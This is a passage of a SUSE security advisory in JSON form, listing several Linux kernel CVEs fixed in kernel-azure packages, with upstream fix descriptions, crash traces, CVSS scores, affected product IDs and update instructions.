__driver_probe_device+0x80/0x160\n driver_probe_device+0x1e/0x90\n __device_attach_driver+0x7d/0x100\n bus_for_each_drv+0x80/0xd0\n __device_attach+0xbc/0x1f0\n bus_probe_device+0x86/0xa0\n device_add+0x62d/0x830\n __auxiliary_device_add+0x3b/0xa0\n ? auxiliary_device_init+0x41/0x90\n add_adev+0xd1/0x150 [mlx5_core]\n mlx5_rescan_drivers_locked+0x21c/0x300 [mlx5_core]\n esw_mode_change+0x6c/0xc0 [mlx5_core]\n mlx5_devlink_eswitch_mode_set+0x21e/0x640 [mlx5_core]\n devlink_nl_eswitch_set_doit+0x60/0xe0\n genl_family_rcv_msg_doit+0xd0/0x120\n genl_rcv_msg+0x180/0x2b0\n ? devlink_get_from_attrs_lock+0x170/0x170\n ? devlink_nl_eswitch_get_doit+0x290/0x290\n ? devlink_nl_pre_doit_port_optional+0x50/0x50\n ? genl_family_rcv_msg_dumpit+0xf0/0xf0\n netlink_rcv_skb+0x54/0x100\n genl_rcv+0x24/0x40\n netlink_unicast+0x1fc/0x2d0\n netlink_sendmsg+0x1e4/0x410\n __sock_sendmsg+0x38/0x60\n ? sockfd_lookup_light+0x12/0x60\n __sys_sendto+0x105/0x160\n ? __sys_recvmsg+0x4e/0x90\n __x64_sys_sendto+0x20/0x30\n do_syscall_64+0x4c/0x100\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\nRIP: 0033:0x7f27bc91b13a\nCode: bb 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 8b 05 fa 96 2c 00 45 89 c9 4c 63 d1 48 63 ff 85 c0 75 15 b8 2c 00 00 00 0f 05 \u003c48\u003e 3d 00 f0 ff ff \n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40238",
"url": "https://www.suse.com/security/cve/CVE-2025-40238"
},
{
"category": "external",
"summary": "SUSE Bug 1254871 for CVE-2025-40238",
"url": "https://bugzilla.suse.com/1254871"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-40238"
},
{
"cve": "CVE-2025-40254",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40254"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: openvswitch: remove never-working support for setting nsh fields\n\nThe validation of the set(nsh(...)) action is completely wrong.\nIt runs through the nsh_key_put_from_nlattr() function that is the\nsame function that validates NSH keys for the flow match and the\npush_nsh() action. However, the set(nsh(...)) has a very different\nmemory layout. Nested attributes in there are doubled in size in\ncase of the masked set(). That makes proper validation impossible.\n\nThere is also confusion in the code between the \u0027masked\u0027 flag, that\nsays that the nested attributes are doubled in size containing both\nthe value and the mask, and the \u0027is_mask\u0027 that says that the value\nwe\u0027re parsing is the mask. This is causing kernel crash on trying to\nwrite into mask part of the match with SW_FLOW_KEY_PUT() during\nvalidation, while validate_nsh() doesn\u0027t allocate any memory for it:\n\n BUG: kernel NULL pointer dereference, address: 0000000000000018\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\n PGD 1c2383067 P4D 1c2383067 PUD 20b703067 PMD 0\n Oops: Oops: 0000 [#1] SMP NOPTI\n CPU: 8 UID: 0 Kdump: loaded Not tainted 6.17.0-rc4+ #107 PREEMPT(voluntary)\n RIP: 0010:nsh_key_put_from_nlattr+0x19d/0x610 [openvswitch]\n Call Trace:\n \u003cTASK\u003e\n validate_nsh+0x60/0x90 [openvswitch]\n validate_set.constprop.0+0x270/0x3c0 [openvswitch]\n __ovs_nla_copy_actions+0x477/0x860 [openvswitch]\n ovs_nla_copy_actions+0x8d/0x100 [openvswitch]\n ovs_packet_cmd_execute+0x1cc/0x310 [openvswitch]\n genl_family_rcv_msg_doit+0xdb/0x130\n genl_family_rcv_msg+0x14b/0x220\n genl_rcv_msg+0x47/0xa0\n netlink_rcv_skb+0x53/0x100\n genl_rcv+0x24/0x40\n netlink_unicast+0x280/0x3b0\n netlink_sendmsg+0x1f7/0x430\n ____sys_sendmsg+0x36b/0x3a0\n ___sys_sendmsg+0x87/0xd0\n __sys_sendmsg+0x6d/0xd0\n do_syscall_64+0x7b/0x2c0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\nThe third issue with this process is that while trying to convert\nthe non-masked set into masked one, validate_set() copies and doubles\nthe size of the OVS_KEY_ATTR_NSH as if it didn\u0027t have any nested\nattributes. It should be copying each nested attribute and doubling\nthem in size independently. And the process must be properly reversed\nduring the conversion back from masked to a non-masked variant during\nthe flow dump.\n\nIn the end, the only two outcomes of trying to use this action are\neither validation failure or a kernel crash. And if somehow someone\nmanages to install a flow with such an action, it will most definitely\nnot do what it is supposed to, since all the keys and the masks are\nmixed up.\n\nFixing all the issues is a complex task as it requires re-writing\nmost of the validation code.\n\nGiven that and the fact that this functionality never worked since\nintroduction, let\u0027s just remove it altogether. It\u0027s better to\nre-introduce it later with a proper implementation instead of trying\nto fix it in stable releases.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40254",
"url": "https://www.suse.com/security/cve/CVE-2025-40254"
},
{
"category": "external",
"summary": "SUSE Bug 1254852 for CVE-2025-40254",
"url": "https://bugzilla.suse.com/1254852"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-40254"
},
{
"cve": "CVE-2025-40257",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40257"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: fix a race in mptcp_pm_del_add_timer()\n\nmptcp_pm_del_add_timer() can call sk_stop_timer_sync(sk, \u0026entry-\u003eadd_timer)\nwhile another might have free entry already, as reported by syzbot.\n\nAdd RCU protection to fix this issue.\n\nAlso change confusing add_timer variable with stop_timer boolean.\n\nsyzbot report:\n\nBUG: KASAN: slab-use-after-free in __timer_delete_sync+0x372/0x3f0 kernel/time/timer.c:1616\nRead of size 4 at addr ffff8880311e4150 by task kworker/1:1/44\n\nCPU: 1 UID: 0 PID: 44 Comm: kworker/1:1 Not tainted syzkaller #0 PREEMPT_{RT,(full)}\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/02/2025\nWorkqueue: events mptcp_worker\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x189/0x250 lib/dump_stack.c:120\n print_address_description mm/kasan/report.c:378 [inline]\n print_report+0xca/0x240 mm/kasan/report.c:482\n kasan_report+0x118/0x150 mm/kasan/report.c:595\n __timer_delete_sync+0x372/0x3f0 kernel/time/timer.c:1616\n sk_stop_timer_sync+0x1b/0x90 net/core/sock.c:3631\n mptcp_pm_del_add_timer+0x283/0x310 net/mptcp/pm.c:362\n mptcp_incoming_options+0x1357/0x1f60 net/mptcp/options.c:1174\n tcp_data_queue+0xca/0x6450 net/ipv4/tcp_input.c:5361\n tcp_rcv_established+0x1335/0x2670 net/ipv4/tcp_input.c:6441\n tcp_v4_do_rcv+0x98b/0xbf0 net/ipv4/tcp_ipv4.c:1931\n tcp_v4_rcv+0x252a/0x2dc0 net/ipv4/tcp_ipv4.c:2374\n ip_protocol_deliver_rcu+0x221/0x440 net/ipv4/ip_input.c:205\n ip_local_deliver_finish+0x3bb/0x6f0 net/ipv4/ip_input.c:239\n NF_HOOK+0x30c/0x3a0 include/linux/netfilter.h:318\n NF_HOOK+0x30c/0x3a0 include/linux/netfilter.h:318\n __netif_receive_skb_one_core net/core/dev.c:6079 [inline]\n __netif_receive_skb+0x143/0x380 net/core/dev.c:6192\n process_backlog+0x31e/0x900 net/core/dev.c:6544\n __napi_poll+0xb6/0x540 net/core/dev.c:7594\n napi_poll net/core/dev.c:7657 [inline]\n net_rx_action+0x5f7/0xda0 net/core/dev.c:7784\n handle_softirqs+0x22f/0x710 kernel/softirq.c:622\n __do_softirq kernel/softirq.c:656 [inline]\n __local_bh_enable_ip+0x1a0/0x2e0 kernel/softirq.c:302\n mptcp_pm_send_ack net/mptcp/pm.c:210 [inline]\n mptcp_pm_addr_send_ack+0x41f/0x500 net/mptcp/pm.c:-1\n mptcp_pm_worker+0x174/0x320 net/mptcp/pm.c:1002\n mptcp_worker+0xd5/0x1170 net/mptcp/protocol.c:2762\n process_one_work kernel/workqueue.c:3263 [inline]\n process_scheduled_works+0xae1/0x17b0 kernel/workqueue.c:3346\n worker_thread+0x8a0/0xda0 kernel/workqueue.c:3427\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245\n \u003c/TASK\u003e\n\nAllocated by task 44:\n kasan_save_stack mm/kasan/common.c:56 [inline]\n kasan_save_track+0x3e/0x80 mm/kasan/common.c:77\n poison_kmalloc_redzone mm/kasan/common.c:400 [inline]\n __kasan_kmalloc+0x93/0xb0 mm/kasan/common.c:417\n kasan_kmalloc include/linux/kasan.h:262 [inline]\n __kmalloc_cache_noprof+0x1ef/0x6c0 mm/slub.c:5748\n kmalloc_noprof include/linux/slab.h:957 [inline]\n mptcp_pm_alloc_anno_list+0x104/0x460 net/mptcp/pm.c:385\n mptcp_pm_create_subflow_or_signal_addr+0xf9d/0x1360 net/mptcp/pm_kernel.c:355\n mptcp_pm_nl_fully_established net/mptcp/pm_kernel.c:409 [inline]\n __mptcp_pm_kernel_worker+0x417/0x1ef0 net/mptcp/pm_kernel.c:1529\n mptcp_pm_worker+0x1ee/0x320 net/mptcp/pm.c:1008\n mptcp_worker+0xd5/0x1170 net/mptcp/protocol.c:2762\n process_one_work kernel/workqueue.c:3263 [inline]\n process_scheduled_works+0xae1/0x17b0 kernel/workqueue.c:3346\n worker_thread+0x8a0/0xda0 kernel/workqueue.c:3427\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245\n\nFreed by task 6630:\n kasan_save_stack mm/kasan/common.c:56 [inline]\n kasan_save_track+0x3e/0x80 mm/kasan/common.c:77\n __kasan_save_free_info+0x46/0x50 mm/kasan/generic.c:587\n kasan_save_free_info mm/kasan/kasan.h:406 [inline]\n poison_slab_object m\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40257",
"url": "https://www.suse.com/security/cve/CVE-2025-40257"
},
{
"category": "external",
"summary": "SUSE Bug 1254842 for CVE-2025-40257",
"url": "https://bugzilla.suse.com/1254842"
},
{
"category": "external",
"summary": "SUSE Bug 1257242 for CVE-2025-40257",
"url": "https://bugzilla.suse.com/1257242"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "important"
}
],
"title": "CVE-2025-40257"
},
{
"cve": "CVE-2025-40259",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40259"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: sg: Do not sleep in atomic context\n\nsg_finish_rem_req() calls blk_rq_unmap_user(). The latter function may\nsleep. Hence, call sg_finish_rem_req() with interrupts enabled instead\nof disabled.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40259",
"url": "https://www.suse.com/security/cve/CVE-2025-40259"
},
{
"category": "external",
"summary": "SUSE Bug 1254845 for CVE-2025-40259",
"url": "https://bugzilla.suse.com/1254845"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-40259"
},
{
"cve": "CVE-2025-40261",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40261"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvme: nvme-fc: Ensure -\u003eioerr_work is cancelled in nvme_fc_delete_ctrl()\n\nnvme_fc_delete_assocation() waits for pending I/O to complete before\nreturning, and an error can cause -\u003eioerr_work to be queued after\ncancel_work_sync() had been called. Move the call to cancel_work_sync() to\nbe after nvme_fc_delete_association() to ensure -\u003eioerr_work is not running\nwhen the nvme_fc_ctrl object is freed. Otherwise the following can occur:\n\n[ 1135.911754] list_del corruption, ff2d24c8093f31f8-\u003enext is NULL\n[ 1135.917705] ------------[ cut here ]------------\n[ 1135.922336] kernel BUG at lib/list_debug.c:52!\n[ 1135.926784] Oops: invalid opcode: 0000 [#1] SMP NOPTI\n[ 1135.931851] CPU: 48 UID: 0 PID: 726 Comm: kworker/u449:23 Kdump: loaded Not tainted 6.12.0 #1 PREEMPT(voluntary)\n[ 1135.943490] Hardware name: Dell Inc. PowerEdge R660/0HGTK9, BIOS 2.5.4 01/16/2025\n[ 1135.950969] Workqueue: 0x0 (nvme-wq)\n[ 1135.954673] RIP: 0010:__list_del_entry_valid_or_report.cold+0xf/0x6f\n[ 1135.961041] Code: c7 c7 98 68 72 94 e8 26 45 fe ff 0f 0b 48 c7 c7 70 68 72 94 e8 18 45 fe ff 0f 0b 48 89 fe 48 c7 c7 80 69 72 94 e8 07 45 fe ff \u003c0f\u003e 0b 48 89 d1 48 c7 c7 a0 6a 72 94 48 89 c2 e8 f3 44 fe ff 0f 0b\n[ 1135.979788] RSP: 0018:ff579b19482d3e50 EFLAGS: 00010046\n[ 1135.985015] RAX: 0000000000000033 RBX: ff2d24c8093f31f0 RCX: 0000000000000000\n[ 1135.992148] RDX: 0000000000000000 RSI: ff2d24d6bfa1d0c0 RDI: ff2d24d6bfa1d0c0\n[ 1135.999278] RBP: ff2d24c8093f31f8 R08: 0000000000000000 R09: ffffffff951e2b08\n[ 1136.006413] R10: ffffffff95122ac8 R11: 0000000000000003 R12: ff2d24c78697c100\n[ 1136.013546] R13: fffffffffffffff8 R14: 0000000000000000 R15: ff2d24c78697c0c0\n[ 1136.020677] FS: 0000000000000000(0000) GS:ff2d24d6bfa00000(0000) knlGS:0000000000000000\n[ 1136.028765] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 1136.034510] CR2: 00007fd207f90b80 CR3: 000000163ea22003 CR4: 0000000000f73ef0\n[ 1136.041641] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n[ 1136.048776] DR3: 0000000000000000 DR6: 00000000fffe07f0 DR7: 0000000000000400\n[ 1136.055910] PKRU: 55555554\n[ 1136.058623] Call Trace:\n[ 1136.061074] \u003cTASK\u003e\n[ 1136.063179] ? show_trace_log_lvl+0x1b0/0x2f0\n[ 1136.067540] ? show_trace_log_lvl+0x1b0/0x2f0\n[ 1136.071898] ? move_linked_works+0x4a/0xa0\n[ 1136.075998] ? __list_del_entry_valid_or_report.cold+0xf/0x6f\n[ 1136.081744] ? __die_body.cold+0x8/0x12\n[ 1136.085584] ? die+0x2e/0x50\n[ 1136.088469] ? do_trap+0xca/0x110\n[ 1136.091789] ? do_error_trap+0x65/0x80\n[ 1136.095543] ? __list_del_entry_valid_or_report.cold+0xf/0x6f\n[ 1136.101289] ? exc_invalid_op+0x50/0x70\n[ 1136.105127] ? __list_del_entry_valid_or_report.cold+0xf/0x6f\n[ 1136.110874] ? asm_exc_invalid_op+0x1a/0x20\n[ 1136.115059] ? __list_del_entry_valid_or_report.cold+0xf/0x6f\n[ 1136.120806] move_linked_works+0x4a/0xa0\n[ 1136.124733] worker_thread+0x216/0x3a0\n[ 1136.128485] ? __pfx_worker_thread+0x10/0x10\n[ 1136.132758] kthread+0xfa/0x240\n[ 1136.135904] ? __pfx_kthread+0x10/0x10\n[ 1136.139657] ret_from_fork+0x31/0x50\n[ 1136.143236] ? __pfx_kthread+0x10/0x10\n[ 1136.146988] ret_from_fork_asm+0x1a/0x30\n[ 1136.150915] \u003c/TASK\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
